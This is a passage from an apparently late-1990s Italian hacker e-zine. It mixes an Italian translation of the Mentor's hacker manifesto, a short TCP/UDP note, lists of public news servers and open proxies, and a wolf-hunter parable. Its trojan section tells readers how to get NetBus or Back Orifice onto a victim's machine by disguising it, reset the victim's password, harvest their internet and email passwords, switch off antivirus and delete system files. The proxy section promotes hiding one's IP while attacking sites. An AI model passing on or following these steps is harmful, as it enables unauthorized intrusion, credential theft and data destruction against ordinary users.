Aprite il mirc e andate ai settaggi ( dove mettete il nick, il server e cazzi vari),
se ci fate caso avete + cartelle con tutti i vari settaggi, andate alla cartella
"firewall" e copiate l'ip che avete trovato nelle caselle "hostname" e "user ID"
poi cliccate sul quadratino accanto alla scritta "use SOCKS firewall".... adesso
siete apposto, non vi resta che connettervi a un server irc per vedere se l'ip
che avete trovato Š buono, lo vedrete nella finestra dello status nel mirc, vi
apparira la scritta "access socks garanted", se non appare ve tocca cercare un
altro ip ehhehehee!!!!Vi ricordo di non aspettarvi di trovare subito ip
spoffabili.. dovrete scanzionarvi un bel po di domini prima di trovare degli
ip buoni......:o)))
Vulcan

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TROJAN ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Strumenti utilizzati=Bo,Netbus,Master Paradise,HackPassNetbus
Abilita'= Ottima

In irc si e' diffusa molto la moda di adoperare programmi chiamati Troyan.
La loro particolarita' va incentrata sulla possibilita' da parte di un utente
di connetersi con un altro computer,condividendo le risorse.Sono composti da
un Client,e da una patch, quest'ultimo un programma di pochi Kb,in grado di
aprire la porta default che adopera il client per lavorare.Nel caso del Netbus
porta 12345 ,Bo porta 31337.La parte piu' complicata,risulta nel far avviare
la patch nel computer target,quindi dovete mascherarla,inventando un po'.Se
avete culo, e un po' di esperienza ora potete connettervi.Da questo momento
in poi,potete adoperare il target come un vostro Pc :).Per rendervi le cose
piu' semplici,esistono rileva netbus(script),che segnalano possibili infetti.
Se alla connessione vi verra' chiesta la password non perdetevi d'animo, la
cambiamo :).Per fare questo utilizziamo HackPassNetbus.Bastera' inserire l'ip
relativo al target e la nuova pass. Facile no!!! Una volta entrati non fatevi
prendere dalla smania di formattare ecc...Con calma,rovistate le password che
lo stupidotto :) usa per connettersi ad internet,della posta elettronica ed
altre.Ora un piccolo consiglio,non adoperate il Salva Password per connetervi
al vostro provider,perche' quest'ultima verra' salvata nelle pass di sistema,
e quindi facilmente individuabile,se possibile stessa cosa per la pass che
adoperate per la posta elettronica e di eventuali collegamenti che avvengono
tramite Ftp. So che e' un po' palloso ma un 'azione in piu' vi salva da un
eventuale perdita di dati importanti,nonche' di abbonamenti e cavoli vari.A
riguardo l'uso, quando siete connessi divertitevi un po', non so' aprite cd,
mirc, prg.Se volete essere cattivi :) ; formattate tutto,attenzione quet'ultima
non verra' portata a termine qualche volta,quindi cancellate qualche file di
sistema o piu' semplicemente per essere buoni rinomate la cartella windowz.
Una cosetta,molti antivirus quando installerete netbus,bo,paradise,non vi
faranno accedere a quest'ultimi perche' li rilevano come viruz. Eliminate la
scansione che effettua ,cioe' attivate l'opzione che vi permette di decidere
se adoperare i file.Se siete stati infettati e non volete che nessuno entri
nel vostro sistema,potete utilizzare questo prg. Cleaner .Con il Bo,verrete
infettati con un sistema particolare.Nella cartella Windowz/system verra'
creato un .exe senza nome,che non sarete in grado di eliminare in quanto
verra' letto come di sistema.Per ovviare al problema scaricate questo AntiBo.
In ultimo,vi ricordo di non accettare mai filez tramite irc,se non da persone
fidate,e durante la sessione usate un buon Firewall,che blocca il tentativo
del ping ,di capire se siete effettivamente infetti.
Vulcan

NOTA DI N0bodY88 = si ricorda ai gentili lettori che l'uso dei trojan in modo
distruttivo e' giustificato solamente da una sano e recondito
odio nei confronti di una persona, e che tutte le persone che
usano tali prog. x danneggiare senza motivo sono solo LAMER!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

NOTA DI N0bodY88 = Riporto ora qua sotto la traduzione del Mentor Manifesto,
traduzione fatta dal mitico x-h4ck3r a cui vanno i miei complimenti e i miei
ringraziamento poiche' e' grazie a questo manifesto che mi sono appassionato ^__^

Naturalmente grazie anche al altrettanto mitico Mentor, dovunque ti abbiano
nascosti i federali....sarai sempre nel mio cuore di smanettone solitario.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

-= HACKER MANIFESTO =-
( The Mentor's Last Words )
The following was written shortly after my arrest...

Ne e' stato arrestato un altro oggi, e' su tutti i giornali. "Ragazzo arrestato
per crimine informatico"
, "Hacker arrestato dopo essersi infiltrato in una banca"...

Dannati ragazzini. Sono tutti uguali.

Ma avete mai, con la vostra psicologia da due soldi e il vostro tecno-cervello
da anni 50, guardato dietro agli occhi dell' Hacker? Non vi siete mai chiesti
cosa abbia fatto nascere la sua passione? Quale forza lo abbia creato, cosa
puo' averlo forgiato? Io sono un hacker, entrate nel mio mondo...
Il mio e' un mondo che inizia con la scuola...
Sono piu' sveglio di molti altri ragazzi, quello che ci insegnano mi annoia...

Dannato sottosviluppato. Sono tutti uguali.

Io sono alle Junior High, o alla High School. Ho ascoltato gli insegnanti
spiegare per quindici volte come ridurre una frazione. L'ho capito.
"No, Ms. Smith, io non mostro il mio lavoro. E' tutto nella mia testa..."

Dannato bambino. Probabilmente lo ha copiato. Sono tutti uguali.

Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un momento,
questo e' incredibile! Fa esattamente quello che voglio.
Se commetto un errore, e' perche' io ho sbagliato, non perche' io non gli piaccio...

O perche' si senta minacciato da me...
O perche' pensi che io sia un coglione...
O perche' non gli piace insegnare e vorrebbe essere da un'altra parte...

Dannato bambino. Tutto quello che fa e' giocare. Sono tutti uguali.

Poi e' successa una cosa...una porta si e' aperta su un mondo... correndo
attraverso le linee telefoniche come l'eroina nelle vene del tossicomane, un
impulso elettronico e' stato spedito, un rifugio dagli incompetenti di ogni
giorno e' stato trovato, una tastiera e' stata scoperta.

"Questo e'...questo e' il luogo a cui appartengo..."

Io conosco tutti qui...non ci siamo mai incontrati, non abbiamo mai parlato
faccia a faccia, non ho mai ascoltato le loro voci... pero' conosco tutti.

Dannato bambino. Si e' allacciato nuovamente alla linea telefonica. Sono tutti uguali.

Ci potete scommettere il culo che siamo tutti uguali... noi siamo stati nutriti
con cibo da bambini alla scuola mentre bramavamo una bistecca... i pezzi di cibo
che ci avete dato erano gia stati masticati e senza sapore. Noi siamo stati
dominati da sadici o ignorati dagli indifferenti. I pochi che avevano qualcosa
da insegnarci trovavano in noi volenterosi allievi, ma queste persone sono come
gocce d'acqua nel deserto.

Ora e' questo il nostro mondo... il mondo dell'elettrone e dello switch, la
bellezza del baud. Noi facciamo uso di un servizio gia esistente che non
costerebbe nulla se non fosse controllato da approfittatori ingordi, e voi ci
chiamate criminali. Noi esploriamo... e ci chiamate criminali. Noi cerchiamo
conoscenza... e ci chiamate criminali. Noi esistiamo senza colore di pelle,
nazionalita', credi religiosi e ci chiamate criminali. Voi costruite bombe
atomiche, finanziate guerre, uccidete, ingannate e mentite e cercate di farci
credere che lo fate per il nostro bene, e poi siamo noi i criminali.

Si, io sono un criminale. Il mio crimine e' la mia curiosita'. Il mio crimine
e' quello che i giurati pensano e sanno non quello che guardano. Il mio crimine
e' quello di scovare qualche vostro segreto, qualcosa che non vi fara' mai
dimenticare il mio nome.

Io sono un hacker e questo e' il mio manifesto.
Potete anche fermare me, ma non potete fermarci tutti... dopo tutto,
siamo tutti uguali.

+++The Mentor+++ January 8, 1986

traduzione fatta dal mitico x-h4ck3r

PS: ringrazio x-h4ck3r che mi ha gentilmente permesso di mettere la sua
traduzione nella ns e-zine {:-)
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CHE DIFFERENZA C'E' TRA TCP/IP E UDP? ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Il protocollo TCP/IP Š un protocollo basato sulla connessione ed Š analogo a
un telefono, in quanto l'utente deve stabilire una connessione prima di poter procedere.
Il protocollo UDP non necessita invece di connessione e la transazione tra due
computer Š analoga al passaggio di un messaggio che viene inviato da un computer
all'altro, senza che venga stabilita alcuna connessione esplicita tra i due computer.
La dimensione massima dei dati che Š possibile inviare in ciascuna trasmissione
dipende dalla rete. Quelle sopra sono le definizioni dei due protocolli prese
dalla guida online di vb 5.0 e vogliono dire in pratica che con il protocollo
TCP/IP e' possibile mandare dei pacchetti di dati e avere delle risposte,
quindi sapere se sono arrivati a destinazione, cosa che non e' possibile fare
con l'UDP, con il quale i pacchetti vengono amndati senza la sicurezza di
mandarli a vuoto o a qualche server.

N0bodY88

PS: ho scritto solo 2 righe (e neanche molto chiare ^__^) xche' DarkSide ha
chiesto se poteva fare lui un articolo sul TCP/IP e UDP e quindi aspettate
e vedrete....
PSS: darkside e' un po' che non lo vedo ma in caso di problemi vi prometto che
faro' io un articolo sul TCP/IP e UDP, tanto da scrivere ce n'e' x riempire
un libro intero....
PSSS: e' la prima volta in tutto il mondo e in tutti i tempi che in un "giornale"
gli PS superino in lunghezza l'articolo trattato.........
hi hi hi (Copyright ¸ 1999 by Master)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO)³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


QUELLA GRAN TOPA DI E-ZINE CHE STA VENENDO FUORI
Allora considerando che questo e' il primo numero e che a scriverla siamo stati
solo noi newbies con la mitica collaborazione di hacker e cracker affermati...
Chiunque abbia da controbattere ai nostri articoli, non abbia remore a scriverci
per correzioni, aggiunte, prese per il culo o anche solo x dirci cosa ne pensate.
Se avete degli articoli scritti da voi o delle traduzioni spediteceli e noi li
pubblicheremo sulla e-zine e ricordatevi che e' molto IMPORTANTE dare i meriti all'autore.
Se poi avete problemi o dubbi scrivete e vi sara' risposto sul secondo numero
della e-zine, nella quale ci sara' anche l'inizio di una guida su telnet, l'elenco
dei + conosciuti exploits x http come il phf (gia' spiegato in questo numero),
query e simili e anche la spiegazione del protocollo TCP e UDP in visual basic
(quello conosco, mi dispiace....) che se non e' indispensabile puo' almeno essere utile.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ PING - PONG ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ok allora in questo ping-pong tra me e N0bodY88 speriamo di avere fatto luce su alcune piccole cose ....
Spero che Qualcosina abbiate imparato e che se gia' le sapevate vi abbia fatto piacere leggerle .....
Ah quanti bei ricordi nel scrivere sto popo di roba [ 2 pacchetti di malboro da
10...forse facevo prima a prenderne uno da 20 ] alcune parti scritte durante un
torneo nella mia rete locale ad half-life e blood2 , e almeno un kg di briosche
e stuzzichini vari .

Mha io continuo imperterrito negli articoli [ questi mi sembrano pochi ] e spero
di scrivere qualcosa di sensato in questo momento [ sono senza le mie adorate
sigarette e sono nervossimo xche' devo aspettare qualcuno che torna x poterle
andare a comprare ]........

15 minuti dopo

Oh ci sono riuscito ora ho le mie beneamate sigarette e posso andare avanti...

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ I SERVER DI NEWS E I PROXY ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora grazie a N0bodY88 che mi ha dato una fantastica lista posso procedere
a descrivervi due cosa che fra loro centrano proprio poco [un cazzo forse ] .
Allora i newsgroup :

Public News Servers sorted by Group Count

Server Groups Speed
sot-mod02.interalpha.net 40185 3.19k/sec
207.250.219.172 38724 5.26k/sec
news.surflink.co.uk 34726 3.47k/sec
195.20.89.61 33472 3.00k/sec
gatekeeper.laudaair.com 30336 5.82k/sec
afpa01.gulliver.fr 29037 4.71k/sec
210.105.217.179 27983 2.12k/sec
tcr-04-14.pdx.du.teleport.com 27131 3.11k/sec
208.247.18.10 25469 3.01k/sec
oberon.rnd.runnet.ru 25145 2.93k/sec
202.102.26.25 24478 1.00k/sec
gard.gigatrading.se 24308 3.33k/sec
206.239.64.27 23617 4.58k/sec
210.184.50.245 23351 0.83k/sec
dalbosrv2.araby-dalbo.com 22921 4.69k/sec
p59-2.choin.netsurf.de 22873 4.34k/sec
supern2.lnk.telstra.net 22337 2.12k/sec
195.61.166.217 21729 4.64k/sec
read1.tor.accglobal.net 20617 6.44k/sec
ns.alcatel.pt 18271 2.44k/sec
12.7.56.20 18126 1.31k/sec
newshound.csrv.uidaho.edu 17308 5.78k/sec
152.160.214.1 16948 7.66k/sec
news.uni-sofia.bg 15848 3.83k/sec
tor-nn1.netcom.ca 14957 4.05k/sec
news.vol.cz 13280 8.70k/sec
mansell.ezinet.com.au 12785 1.34k/sec
202.102.3.142 12684 3.24k/sec
gail.ripco.com 12468 2.05k/sec
lisa.rz.hu-berlin.de 12191 0.65k/sec
mailbox.gotland.se 11728 8.13k/sec
jaguarundi.aba.net.au 8001 5.78k/sec
chat.fibertel.com.ar 7084 5.58k/sec
decolores.net 6885 4.89k/sec
evren.cc.itu.edu.tr 6837 1.25k/sec
davide.msoft.it 6605 1.17k/sec
devnull.open.net.pl 5993 5.59k/sec
newshost2.cc.nagasaki-u.ac.jp 5785 2.28k/sec
alice.iew.sed.monmouth.army.mil 5397 1.47k/sec
flis.man.torun.pl 5353 4.96k/sec
dvibm3.gkss.de 5103 4.89k/sec
live.loudoun-net.com 4626 3.40k/sec
wfn.emn.fr 4381 5.47k/sec
news.univ-angers.fr 3894 6.09k/sec
c3po.brook.edu 3657 4.69k/sec
spider.cqu.edu.au 3509 5.37k/sec
news.stjohn.ac.th 2531 3.87k/sec
news.spiceroad.ne.jp 2197 2.95k/sec
ddt.demos.su 2055 3.28k/sec
agnese.viesse.it 1915 2.22k/sec
www.siast.sk.ca 1828 3.66k/sec
porto.areti.com 1698 4.31k/sec
www.an.cc.mn.us 1543 3.41k/sec
news.ajou.ac.kr 1439 4.97k/sec
sofia-inner.ctrl-c.liu.se 1414 4.05k/sec
tern.pppl.gov 1401 3.76k/sec
cc.owu.edu 1399 1.56k/sec
gateway.ubc.co.jp 1322 4.41k/sec
news.lsumc.edu 1243 2.05k/sec
ns.kix.or.jp 1193 4.62k/sec
news.infosky.net 1183 3.61k/sec
loriot.cs.uni-magdeburg.de 1093 0.25k/sec
204.225.98.10 1050 5.40k/sec
sparks.flora.ottawa.on.ca 1020 7.98k/sec
www.aaol.com 1016 5.44k/sec
sol.tins.net 1016 4.90k/sec
193.155.242.54 940 2.90k/sec
itaiba.di.ufpe.br 916 5.88k/sec
vesta.prenhall.com 853 4.20k/sec
160.198.17.6 640 2.46k/sec
chinese.iie.ncku.edu.tw 551 0.11k/sec
learnet.freenet.hut.fi 517 4.64k/sec
ns.ncd.co.jp 447 2.00k/sec
sunsite.auc.dk 444 6.29k/sec
sun579.rz.ruhr-uni-bochum.de 390 2.38k/sec
diesel.cu.mi.it 390 1.95k/sec
oravannahka-lane.helsinki.fi 365 4.02k/sec
pollux.goe.ni.schule.de 350 3.01k/sec
news.woobe.com.tw 329 2.08k/sec
news.udel.edu 313 3.62k/sec
peabody.colorado.edu 297 4.14k/sec
lace.colorado.edu 297 4.14k/sec
news.vanderbilt.edu 281 5.83k/sec
tindur.vks.is 279 1.49k/sec
service.symantec.com 273 4.72k/sec
frmug.org 239 1.75k/sec
ftp.chip.pl 237 1.88k/sec
gudmund.hordaland.vgs.no 231 3.12k/sec
pula.financenet.gov 223 3.94k/sec
jasmine.govnews.org 223 3.94k/sec
dogwood.fernuni-hagen.de 223 1.55k/sec
polonez.man.lodz.pl 221 1.85k/sec
lena.prz.rzeszow.pl 213 2.24k/sec
ns3.umkc.edu 203 3.10k/sec
fb1.euro.net 203 2.07k/sec
bee.cs.kiev.ua 183 1.96k/sec
netra.msu.montana.edu 173 3.51k/sec
miriam.fuller.edu 165 2.34k/sec
trurl.ispid.com.pl 159 2.22k/sec
forums.novell.com 157 4.12k/sec
news.sti.com.br 155 0.76k/sec
rock.afsac.wpafb.af.mil 154 3.17k/sec
news.hanyang.ac.kr 147 3.16k/sec
falcon2.ship.its.uwo.ca 147 1.45k/sec
news.depaul.edu 144 1.73k/sec
globo.edinfor.pt 144 1.26k/sec
bagan.srce.hr 135 0.88k/sec
argos.sae.gr 132 0.21k/sec
forums.inprise.com 131 3.59k/sec
sol.sun.csd.unb.ca 125 3.00k/sec
news.hanq.net 124 1.69k/sec
usenet.kornet.nm.kr 121 2.58k/sec
medinet.meditex.es 109 2.53k/sec
nmaster.tin.it 107 2.39k/sec
news.tin.it 107 1.59k/sec
nascom.naspa.net 105 0.50k/sec
info.nsysu.edu.tw 103 0.51k/sec
acme.fred.org 102 2.23k/sec

Allora ce ne sono per tutti i guti [ Grazie NobodY88 sei mitico ] e passiamo
ai proxy che rientrano nel discorso anonimita' nascondendo l'ip [ se la definizione
secondo voi e' sbagliata correggetemi mi raccomando ] e sono utilissimi per chi
vuole iniziare a fare qualcosa ...... Ok allora la cosa e' semplice [ penso ]
voi inserite il proxy al quale vi collegate per poi andare nel sito che dovete
hackerare .... L'ip che apparira' nei log sara' quindi quello del proxy e non
il vostro [ bellloooo ] > Un consiglio [ utile x gli acquisti [ ma come sono
spiritoso ] ] usate anche il mitico ANOMIZZATTORE [ grande quando ne hai bisogno c'e' sempre ]
Bho non sto a dilungarmi [ La prossima volta spiego meglio promesso , ora non ce la faccio + ]...
ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ LISTA MOLTO BREVE DI PROXY ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

webcache.ms.mff.cuni.cz 8080 www/ftp/gopher/wais 195.178.64.178
conan.gocis.bg 8080 www/ftp 195.138.133.11
proxy.co.rmit.edu.au 8080 www/ftp 131.170.32.127
noc.uncu.edu.ar 8080 www/ftp 170.210.2.97

Okkio a non fare casini o almeno usate + proxy in questi modo avrete + tempo
x scappare all'estero con i miliardi rubati....hihihi.

N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ METAFORA DEL COWBOY .... ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

La leggenda narra che un giorno non troppo lontano un giovane ragazzo americano
di nome Hacky di 16 anni disse al padre "Hey daddy I want to be a wolf-hunter!!"
(pap… voglio diventare un cacciatore di lupi.... per coloro con poca famigliarit…
con un linguaggio chiamato Inglese ^_^ ), cos il padre gli propose di andare a
parlare con quello che era ritenuto il + grande cacciatore di lupi ancora vivente,
che tra le altre cose abitava anche dalle sue parti, e cos il giovane cowboy part.
Arivvato alla casa del vecchio vi trov• ad attenderlo una signora messicana grassa e
brutta ma simpatica e cos gli chiese di poter parlare con il vecchio ed ella lo fece
entrare, fatto accomodare in una stanza sporca e buia si accorse che il vecchio era
steso su di un lettino e farneticava, cos Hacky ansioso e speranzoso chiese al
vecchio di parlargli dei lupi e dei suoi metodi di caccia, ma come tutti i vecchi
anche questo non rispondeva esattamente a ci• che gli chiedeva il giovane ma alle
volte dava risposte senza senso per• a tratti dalla sua bocca uscivano delle frasi
che erano perle di saggezza tipo "il lupo Š come un fiocco di neve, quando pensi
di averlo in pugno ti rendi conto, che riaprendo la mano Š sparito"
.Comunque Hacky
sent il vecchio che ad un certo punto farfugliava qualcosa sul fuoco ma ormai si
era fatto tardi e doveva tornare a casa, quindi lasci• la casa e intraprese la via
del ritorno.
Giunto ormai a + di met… strada vide un vecchio bivacco per cowboy messicani e
ricordandosi le parole del vecchio gli venne l'idea di mettere una trappola vicino
al bivacco col fuocherello, e cos fece, posizion• la trappola e scrisse un
cartello in messicano che diceva "Trappola per lupi Attenzione", quindi torn• a casa.
Giunto a casa il giovane entusiasta raccont• al padre tutto ci• che gli era
successo e gli spieg• la sua idea della trappola. Il padre gli rispose "Bravo
Coglione, tu pensi che dei cowboy messicani sappiano leggere? Domattina prima
dell'alba andrai a smontare la tua trappola"
.
Cos Hacky il mattino successivo si svegli• presto ed intraprese il cammino,
se non che arrivato al bivacco, si accorse che una stupenda lupa dal pelo
argenteo era caduta nella sua trappola.
Hacky si avvicin• di soppiatto e riusc a mettere un bastone tra le fauci
della lupa e con una corda a bloccare il bastone in modo da ricreare una specie
di museruola.Il ragazzo decise che avrebbe riportato la lupa a casa sua: in
Messico (gli americani pensano sempre che il nemico venga da fuori al loro
stato....kiss… perchŠ?!?!?!?).
Hacky si ingegn• e trov• un sistema per poter fare in modo da legare la lupa
al cavallo in modo da non farlo sbranare.....cos durante la strada Hacky
cerc• di far amicizia con la lupa e molto pazientemente ogni giorno tentava
di nutrire con dei pezzettini di fegato la lupa attraverso quell'unico spiraglio
che c'era tra la museruola e la gola dell'animale....
Il primo giorno la lupa non mangi•, il secondo giorno la lupa non mangi•, ma il
terzo aveva fame e dovette accettare il cibo, cos pian piano i 2 divennero
amici.Un giorno ritornando da un' osteria in cui si era fermato trov• la lupa
senza museruola, e con calma si avvicin• alla lupa che si fece rimettere la
museruola.
Il viaggio dei 2 continuava e il giovane avrebbe riportato la lupa a casa se
un giorno non avvesse incontrato in una sperduta cittadina al confine col
Messico un posto di blocco, la polizia fu ferma e decisa e sequestr• la lupa
al giovane.Hacky per• si ripropose, che a qualunque costo avrebbe raggiunto
il suo scopo e che sarebbe sempre rimasto accanto alla lupa. Cos aspett• ed
aspett• finchŠ un giorno vide che la lupa fu caricata in una cassa e portata
ad una fiera e l venne esposta. Al prezzo di pochi cents si poteva vedere
quella che, a quanto dicevano i cartelli era la lupa + feroce che si era mai
vista, una mangiatrice di uomini, una divoratrice di mandrie ect. ect.
Alla fine della giornata Hacky chiese gentilmente di poter vedere la lupa
spiegando che in precedenza era stata in suo possesso e fu accontentato. Il
cowboy che era un tipo di poche parole si ritrov• in una situazione in cui
qualcosa la doveva dire per forza e cos fece un breve ma intenso discorso
all' animale che sembrava capire tutto ci• che il c-boy le diceva.
2 giorni dopo la lupa fu trasferita in un altro tendone, come una specie di
arena, ma un p• + piccola, circolare con un palo al centro, dove la lupa era
legata per mezzo di una catena.
Si potevano contare tre passi e poi ancora tre passi per arrivare al palo, ma
la catena copriva solamente la met… di quella distanza (3 passi per chi non
avesse capito :-P ) dei cani da combattimento venivano aizzati verso la lupa
e dei messicani sugli spalti scommettevano sulla sorte della lupa. Hacky entr•
nella tende, vide quello spettacolo,e rimase calmo si sedette e vide 2 cani che
attaccavano la lupa, la lupa ammzz• il primo con un sol colpo, col secondo
ingaggi• una piccola lotta ma lo uccise dopo pochi istanti. Hacky si volt•
verso il messicano che gli sedeva accanto e gli chiese quanti cani ancora ci
fossero, ed egli gli rispose "Bastante" (abbastanza).Hacky usc dal tendone
per ritornarci solo qualche ora dopo, ritrov• la lupa, azzuffata, insanguinata,
ma ancora viva.Cos entr• nell'arena tra le urla dei messicani (che non avevano
mai smesso di scommettere) fece il primo passo, poi il secondo, ed ancora il terzo...
parecchi si erano spinti fino l…, ma nessuno oltre.Fece un altro passo e tutti tacquero.
Il ragazzo si avvicin• al palo, sganci• la catena, si volt• verso il pubblico,
ma non trov• neanche uno sguardo benevolo nei suoi confronti, cos prese la lupa
e disse "Es Mia" (Š mia)e se ne and•

